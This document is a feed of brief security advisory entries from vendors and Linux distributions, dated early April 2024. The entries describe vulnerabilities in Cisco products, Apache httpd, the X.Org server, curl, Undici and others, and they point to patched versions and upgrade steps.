03.04.2024 19:00:00	cisco	[CISCO-SA-TMS-XSS-KGW4DX9Y] Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco TelePresence Management Suite (TMS) could allow a low-privileged, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious data in a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-TMS-XSS-KGW4DX9Y
03.04.2024 19:00:00	cisco	[CISCO-SA-SBIZ-RV-XSS-OQERTUP] Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to visit specific web pages that include malicious payloads. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has not released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SBIZ-RV-XSS-OQERTUP
03.04.2024 19:00:00	cisco	[CISCO-SA-NDRU-PESC-KZ2PQLZH] Cisco Nexus Dashboard Privilege Escalation Vulnerability (medium)	A vulnerability in Cisco Nexus Dashboard could allow an authenticated, local attacker with valid rescue-user credentials to elevate privileges to root on an affected device.This vulnerability is due to insufficient protections for a sensitive access token. An attacker could exploit this vulnerability by using this token to access resources within the device infrastructure. A successful exploit could allow an attacker to gain root access to the filesystem or hosted containers on an affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDRU-PESC-KZ2PQLZH
03.04.2024 19:00:00	cisco	[CISCO-SA-NDO-UPAV-YRQSCCSP] Cisco Nexus Dashboard Orchestrator Unauthorized Policy Actions Vulnerability (medium)	A vulnerability in the tenant security implementation of Cisco Nexus Dashboard Orchestrator (NDO) could allow an authenticated, remote attacker to modify or delete tenant templates on an affected system.This vulnerability is due to improper access controls within tenant security. An attacker who is using a valid user account with write privileges and either a Site Manager or Tenant Manager role could exploit this vulnerability. A successful exploit could allow the attacker to modify or delete tenant templates under non-associated tenants, which could disrupt network traffic.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDO-UPAV-YRQSCCSP
03.04.2024 19:00:00	cisco	[CISCO-SA-NDIDV-LMXDVAF2] Cisco Nexus Dashboard Information Disclosure Vulnerability (medium)	A vulnerability in Cisco Nexus Dashboard could allow an authenticated, remote attacker to learn cluster deployment information on an affected device.This vulnerability is due to improper access controls on a specific API endpoint. An attacker could exploit this vulnerability by sending queries to the API endpoint. A successful exploit could allow an attacker to access metrics and information about devices in the Nexus Dashboard cluster.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDIDV-LMXDVAF2
03.04.2024 19:00:00	cisco	[CISCO-SA-NDFCCSRF-TEMZEFJ9] Cisco Nexus Dashboard and Nexus Dashboard Hosted Services Cross-Site Request Forgery Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Nexus Dashboard and Cisco Nexus Dashboard hosted services could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system.This vulnerability is due to insufficient CSRF protections for the web-based management interface on an affected system. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. If the affected user has administrative privileges, these actions could include modifying the system configuration and creating new privileged accounts.Note: There are internal security mechanisms in place that limit the scope of this exploit, reducing the Security Impact Rating of this vulnerability.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFCCSRF-TEMZEFJ9
03.04.2024 19:00:00	cisco	[CISCO-SA-NDFC-DIR-TRAV-SSN3AYDW] Cisco Nexus Dashboard Fabric Controller Plug and Play Arbitrary File Read Vulnerability (high)	A vulnerability in the Out-of-Band (OOB) Plug and Play (PnP) feature of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an unauthenticated, remote attacker to read arbitrary files.This vulnerability is due to an unauthenticated provisioning web server. An attacker could exploit this vulnerability through direct web requests to the provisioning server. A successful exploit could allow the attacker to read sensitive files in the PnP container that could facilitate further attacks on the PnP infrastructure.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-DIR-TRAV-SSN3AYDW
03.04.2024 19:00:00	cisco	[CISCO-SA-ISE-SSRF-FTSTH5OZ] Cisco Identity Services Engine Server-Side Request Forgery Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a server-side request forgery (SSRF) attack through an affected device.This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. To successfully exploit this vulnerability, the attacker would need valid Super Admin credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-SSRF-FTSTH5OZ
03.04.2024 19:00:00	cisco	[CISCO-SA-ISE-CSRF-NFAKXRP5] Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-CSRF-NFAKXRP5
03.04.2024 19:00:00	cisco	[CISCO-SA-ECE-XSS-CSQXGXFM] Cisco Enterprise Chat and Email Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web UI of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web UI does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To successfully exploit this vulnerability, an attacker would need valid agent credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ECE-XSS-CSQXGXFM
03.04.2024 19:00:00	cisco	[CISCO-SA-CUCM-IMPS-XSS-QUWKD9YF] Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based interface of Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against an authenticated user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading an authenticated user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-IMPS-XSS-QUWKD9YF
03.04.2024 06:15:09	alpinelinux	[ALPINE:CVE-2024-28219] py3-pillow vulnerability (medium)	[From CVE-2024-28219] In _imagingcms.c in Pillow before 10.3.0, a buffer overflow exists because strcpy is used instead of strncpy.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-28219
03.04.2024 03:00:00	debian	[DSA-5653-1] gtkwave (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5653-1
03.04.2024 03:00:00	debian	[DSA-5654-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5654-1
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-12266] kernel security update (important)	[4.18.0-513.18.1.0.1_9.OL8]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters [Orabug: 36461932] {CVE-2024-1086}[4.18.0-513.18.1_9.OL8]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.3- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34750652]- Drop not needed patch	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12266
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-1601] curl security and bug fix update (moderate)	[7.61.1-33.5]- cap SFTP packet size sent (RHEL-5485)- when keyboard-interactive auth fails, try password (#2229800)- unify the upload/method handling (CVE-2023-28322)- fix cookie injection with none file (CVE-2023-38546)- lowercase the domain names before PSL checks (CVE-2023-46218)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1601
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-1608] opencryptoki security update (moderate)	[3.21.0-10]- timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin)Resolves: RHEL-22791	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1608
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-1610] less security update (moderate)	[530-2]- Fix CVE-2022-48624- Resolves: RHEL-26265	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1610
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-1615] expat security update (moderate)	[2.2.5-11.0.1.1]- lib: Prevent integer overflow in doProlog [CVE-2022-23990][Orabug: 33910314][2.2.5-11.1]- CVE-2023-52425 expat: parsing large tokens can trigger a denial of service- Resolves: RHEL-29321	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1615
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-1644] grafana-pcp security and bug fix update (important)	[5.1.1-2]- Rebuild with latest version of golang- resolves CVE-2024-1394	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1644
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-1646] grafana security and bug fix update (important)	[9.2.10-8]- Rebuild with latest version of golang- resolves CVE-2024-1394	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1646
03.04.2024 03:00:00	oraclelinux	[ELSA-2024-12265] kernel security update (important)	- [5.14.0-362.24.1.0.1_3.OL9]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters [Orabug: 36461940 ] {CVE-2024-1086}- [5.14.0-362.24.1_3.OL9]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5- Remove nmap references from kernel (Mridula Shastry) [Orabug: 34313944]- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]- Disable unified kernel image package build- Add Oracle Linux IMA certificates	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12265
03.04.2024 21:23:14	rustsec	[RUSTSEC-2024-0332] Degradation of service in h2 servers with CONTINUATION Flood	An attacker can send a flood of CONTINUATION frames, causing `h2` to process them indefinitely.This results in an increase in CPU usage.Tokio task budget helps prevent this from a complete denial-of-service, as the server can stillrespond to legitimate requests, albeit with increased latency.More details at "https://seanmonstar.com/blog/hyper-http2-continuation-flood/.Patches available for 0.4.x and 0.3.x versions.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0332
03.04.2024 23:26:37	maven	[MAVEN:GHSA-7MG2-6C6V-342R] Apache Pulsar: Improper Authorization For Namespace and Topic Management Endpoints (moderate)	This vulnerability allows authenticated users with produce or consume permissions to perform unauthorized operations on partitioned topics, such as unloading topics and triggering compaction. These management operations should be restricted to users with the tenant admin role or superuser role. An authenticated user with produce permission can create subscriptions and update subscription properties on partitioned topics, even though this should be limited to users with consume permissions. This impact analysis assumes that Pulsar has been configured with the default authorization provider. For custom authorization providers, the impact could be slightly different. Additionally, the vulnerability allows an authenticated user to read, create, modify, and delete namespace properties in any namespace in any tenant. In Pulsar, namespace properties are reserved for user provided metadata about the namespace.This issue affects Apache Pulsar versions from 2.7.1 to 2.10.6, from 2.11.0 to 2.11.4, from 3.0.0 to 3.0.3, from 3.1.0 to 3.1.3, and from 3.2.0 to 3.2.1. 3.0 Apache Pulsar users should upgrade to at least 3.0.4.3.1 and 3.2 Apache Pulsar users should upgrade to at least 3.2.2.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7MG2-6C6V-342R
02.04.2024 23:07:38	go	[GO-2024-2668] Login username enumeration in github.com/IceWhaleTech/CasaOS-UserService (medium)	The Casa OS Login page has a username enumeration vulnerability in thelogin page that was patched in Casa OS v0.4.7. The issue exists becausethe application response differs depending on whether the username orpassword is incorrect, allowing an attacker to enumerate usernames byobserving the application response. For example, if the username isincorrect, the application returns "User does not exist" with returncode "10006", while if the password is incorrect, it returns"User does not exist or password is invalid" with return code "10013".This allows an attacker to determine if a username exists without knowingthe password.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2668
03.04.2024 01:26:38	almalinux	[ALSA-2024:1610] less security update (moderate)	less security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1610
03.04.2024 11:51:24	almalinux	[ALSA-2024:1615] expat security update (moderate)	expat security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1615
03.04.2024 01:28:33	almalinux	[ALSA-2024:1601] curl security and bug fix update (moderate)	curl security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1601
03.04.2024 21:46:18	almalinux	[ALSA-2024:1608] opencryptoki security update (moderate)	opencryptoki security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1608
03.04.2024 17:02:46	almalinux	[ALSA-2024:1644] grafana-pcp security and bug fix update (important)	grafana-pcp security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1644
03.04.2024 18:14:05	almalinux	[ALSA-2024:1646] grafana security and bug fix update (important)	grafana security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1646
03.04.2024 17:53:00	maven	[MAVEN:GHSA-R65J-6H5F-4F92] Withdrawn: JJWT improperly generates signing keys (moderate)	## Withdrawn AdvisoryThis advisory has been withdrawn because it has been found to be disputed. Please see the issue [here](https://github.com/jwtk/jjwt/issues/930#issuecomment-2032699358) for more information.## Original DescriptionJJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R65J-6H5F-4F92
03.04.2024 17:40:51	android	[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)	In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
03.04.2024 17:52:34	almalinux	[ALSA-2024:1484] firefox security update (critical)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1484
03.04.2024 17:53:57	almalinux	[ALSA-2024:1485] firefox security update (critical)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1485
04.04.2024 23:15:08	alpinelinux	[ALPINE:CVE-2023-38709] apache2 vulnerability	[From CVE-2023-38709] Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.This issue affects Apache HTTP Server: through 2.4.58.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38709
04.04.2024 23:15:08	alpinelinux	[ALPINE:CVE-2024-24795] apache2 vulnerability	[From CVE-2024-24795] HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.Users are recommended to upgrade to version 2.4.59, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24795
04.04.2024 23:15:08	alpinelinux	[ALPINE:CVE-2024-27316] apache2 vulnerability	[From CVE-2024-27316] HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27316
04.04.2024 22:17:04	slackware	[SSA:2024-095-02] nghttp2 (medium)	New nghttp2 packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/nghttp2-1.61.0-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: nghttp2 library keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it can accept after a HEADERS frame. For more information, see: https://github.com/nghttp2/nghttp2/security/advisories/GHSA-x6x3-gv8h-m57q https://www.kb.cert.org/vuls/id/421644 https://www.cve.org/CVERecord?id=CVE-2024-28182 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/nghttp2-1.61.0-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/nghttp2-1.61.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/nghttp2-1.61.0-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/nghttp2-1.61.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:ec7c0c10fbd8fc955172c165ac83e820 nghttp2-1.61.0-i586-1_slack15.0.txzSlackware x86_64 15.0 package:83b16e89f34a2b3ab340c4e8be7e013b nghttp2-1.61.0-x86_64-1_slack15.0.txzSlackware -current package:1344e95b1100f186ed42012881ca29c9 n/nghttp2-1.61.0-i586-1.txzSlackware x86_64 -current package:03b5154892afcc2f9bfcaee440229252 n/nghttp2-1.61.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg nghttp2-1.61.0-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-095-02
04.04.2024 22:16:44	slackware	[SSA:2024-095-01] httpd	New httpd packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/httpd-2.4.59-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: HTTP/2 DoS by memory exhaustion on endless continuation frames. HTTP Response Splitting in multiple modules. HTTP response splitting. For more information, see: https://downloads.apache.org/httpd/CHANGES_2.4.59 https://www.cve.org/CVERecord?id=CVE-2024-27316 https://www.cve.org/CVERecord?id=CVE-2024-24795 https://www.cve.org/CVERecord?id=CVE-2023-38709 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.59-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.59-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.59-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.59-x86_64-1.txzMD5 signaturesSlackware 15.0 package:a6e6608bea8071ddfaf5ea39d2454fb9 httpd-2.4.59-i586-1_slack15.0.txzSlackware x86_64 15.0 package:4fdc451a95e9af68974e472df6d752c1 httpd-2.4.59-x86_64-1_slack15.0.txzSlackware -current package:1396ecc3cf3e58a8348b7619f0dff361 n/httpd-2.4.59-i586-1.txzSlackware x86_64 -current package:85c084fc3fda741b121515e011c1db8f n/httpd-2.4.59-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg httpd-2.4.59-i586-1_slack15.0.txz`Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-095-01
04.04.2024 21:14:47	go	[GO-2024-2670] ACL security vulnerability in github.com/hashicorp/nomad (low)	An ACL policy using a block without label can be applied to unexpected resourcesin Nomad, a distributed, highly available scheduler designed for effortlessoperations and management of applications.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2670
04.04.2024 21:06:26	ubuntu	[USN-6721-1] X.Org X Server vulnerabilities (high)	Several security issues were fixed in X.Org X Server, xwayland.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6721-1
04.04.2024 20:05:16	go	[GO-2024-2669] API token secret ID leak to Sentinel in github.com/hashicorp/nomad (low)	A vulnerability exists in Nomad where the API caller's ACL token secretID is exposed to Sentinel policies.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2669
04.04.2024 20:01:46	maven	[MAVEN:GHSA-F8H5-V2VG-46RR] quarkus-core leaks local environment variables from Quarkus namespace during application's build (high)	A vulnerability was found in the quarkus-core component. Quarkus captures the local environment variables from the Quarkus namespace during the application's build. Thus, running the resulting application inherits the values captured at build time. However, some local environment variables may have been set by the developer / CI environment for testing purposes, such as dropping the database during the application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application. It leads to dangerous behavior if the application does not override these values.This behavior only happens for configuration properties from the `quarkus.*` namespace. So, application-specific properties are not captured.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F8H5-V2VG-46RR
04.04.2024 17:21:20	npm	[NPM:GHSA-6CF6-8HVR-R68W] dectalk-tts Uses Unencrypted HTTP Request (high)	### ImpactIn `dectalk-tts@1.0.0`, network requests to the third-party API are sent over HTTP, which is unencrypted. Unencrypted traffic can be easily intercepted and modified by attackers. Anyone who uses the package could be the victim of a [man-in-the-middle (MITM)](https://en.wikipedia.org/wiki/Man-in-the-middle_attack) attack.<ins>Theft</ins>Because `dectalk-tts` is a text-to-speech package, user requests are expected to only contain natural language. The package [README](https://github.com/JstnMcBrd/dectalk-tts/blob/main/README.md) warns that user input is sent to a third-party API, so users should not send sensitive information regardless.But if users ignore the warnings and send sensitive information anyway, that information could be stolen by attackers.<ins>Modification</ins>Attackers could manipulate requests to the API. However, the worst a modified request could do is return an incorrect audio file or bad request rejection.Attackers could also manipulate responses from the API, returning malicious output to the user. Output is expected to be a wav-encoded buffer, which users will likely save to a file. This could be a dangerous entrypoint to the user's filesystem.### PatchesThe network request was upgraded to HTTPS in version `1.0.1`. No other changes were made, so updating is risk-free.### WorkaroundsThere are no workarounds, but here are some precautions:- Do not send any sensitive information.- Carefully verify the API response before saving it.### References[Vulnerable code](https://github.com/JstnMcBrd/dectalk-tts/blob/b3e92156cbb699218ac9b9c7d8979abd0e635767/src/index.ts#L18)[Original report](https://github.com/JstnMcBrd/dectalk-tts/issues/3)[Patch pull request](https://github.com/JstnMcBrd/dectalk-tts/pull/4)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6CF6-8HVR-R68W
04.04.2024 19:25:33	npm	[NPM:GHSA-9QXR-QJ54-H672] Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect (low)	### ImpactIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered.### PatchesFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.Fixes has been released in v5.28.4 and v6.11.1.### WorkaroundsEnsure that `integrity` cannot be tampered with.### Referenceshttps://hackerone.com/reports/2377760	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9QXR-QJ54-H672
04.04.2024 23:24:00	npm	[NPM:GHSA-M4V8-WQVR-P9F7] Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline (low)	### ImpactUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.### PatchesThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.Fixes has been released in v5.28.4 and v6.11.1.### Workaroundsuse `fetch()` or disable `maxRedirections`.### ReferencesLinzi Shang reported this.* https://hackerone.com/reports/2408074* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M4V8-WQVR-P9F7
04.04.2024 17:15:10	alpinelinux	[ALPINE:CVE-2024-31080] xwayland, xorg-server vulnerability (high)	[From CVE-2024-31080] A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIGetSelectedEvents() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31080
04.04.2024 17:15:10	alpinelinux	[ALPINE:CVE-2024-31081] xorg-server, xwayland vulnerability (high)	[From CVE-2024-31081] A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIPassiveGrabDevice() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31081
04.04.2024 17:15:10	alpinelinux	[ALPINE:CVE-2024-31082] xorg-server vulnerability (high)	[From CVE-2024-31082] A heap-based buffer over-read vulnerability was found in the X.org server's ProcAppleDRICreatePixmap() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31082
04.04.2024 04:36:16	ubuntu	[USN-6710-2] Firefox regressions	USN-6710-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6710-2
04.04.2024 03:00:00	cisa	[CISA-2024:0404] CISA Adds 2 Known Exploited Vulnerabilities to Catalog	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0404
04.04.2024 03:00:00	debian	[DSA-5655-1] cockpit (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5655-1
04.04.2024 03:00:00	freebsd	[FREEBSD:57561CFC-F24B-11EE-9730-001FC69CD6DC] xorg server -- Multiple vulnerabilities (high)	The X.Org project reports: CVE-2024-31080: Heap buffer overread/data leakage in ProcXIGetSelectedEvents The ProcXIGetSelectedEvents() function uses the byte-swapped length of the return data for the amount of data to return to the client, if the client has a different endianness than the X server. CVE-2024-31081: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice The ProcXIPassiveGrabDevice() function uses the byte-swapped length of the return data for the amount of data to return to the client, if the client has a different endianness than the X server. CVE-2024-31083: User-after-free in ProcRenderAddGlyphs The ProcRenderAddGlyphs() function calls the AllocateGlyph() function to store new glyphs sent by the client to the X server. AllocateGlyph() would return a new glyph with refcount=0 and a re-used glyph would end up not changing the refcount at all. The resulting glyph_new array would thus have multiple entries pointing to the same non-refcounted glyphs. ProcRenderAddGlyphs() may free a glyph, resulting in a use-after-free when the same glyph pointer is then later used.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:57561CFC-F24B-11EE-9730-001FC69CD6DC
